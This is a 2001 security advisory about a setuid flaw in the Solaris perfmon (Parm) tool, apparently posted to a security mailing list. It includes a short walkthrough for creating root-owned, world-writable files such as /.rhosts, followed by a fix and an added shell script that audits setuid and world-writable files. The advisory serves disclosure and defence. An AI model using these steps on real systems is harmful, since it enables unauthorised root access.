SunOS application perfmon vulnerability

by phiber on March 23rd, 2001

System: Solaris 2.X

Parm is a program that displays system information.
Parm is a SunOS application. It is not included in the Solaris basic package.

There is a vulnerability in the perfmon program that lets you create any file with root privilege.


$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &





Choose Logging -> Logging File

In the Selection part, enter the path of the file you want to create, e.g. /.rhosts

The following file is created within a second.

-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost





Solution:


Remove the setuid permission, contact your vendor and get a patch.
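
The mitigation above as a shell audit, added here as an example and not part of the original advisory or the vendor's tooling. The function names and the PERFMON_DIR variable are hypothetical; the directory default is taken from the session above.

```shell
#!/bin/sh
# Added example: audit helpers for the mitigation described in this advisory.
# PERFMON_DIR is an assumption based on the path shown in the session.
PERFMON_DIR=${PERFMON_DIR:-/opt/JSparm/bin}

# Print regular files under directory $1 that carry the setuid bit.
list_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# Clear the setuid bit on every file list_setuid reports under $1.
# Prints one "cleared <path>" line per file changed.
strip_setuid() {
    list_setuid "$1" | while IFS= read -r f; do
        chmod u-s "$f" && printf 'cleared %s\n' "$f"
    done
}

# Print regular files under $1 (same filesystem only) that are owned by
# user $2 and world-writable. This is the symptom visible in the ls
# output above: a root-owned file created with the caller's umask 0000.
list_world_writable() {
    find "$1" -xdev -type f -user "$2" -perm -0002 -print 2>/dev/null
}

# Typical use, run as root on the affected host:
#   list_setuid "$PERFMON_DIR"        # review what is setuid first
#   strip_setuid "$PERFMON_DIR"       # then remove the bit
#   list_world_writable / root        # look for files already created
```

Review the output of list_world_writable before deleting anything, since some of the files it reports may predate the issue.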


Posted by KimYongJun [www.hackerslab.org] on a bt mailing list.

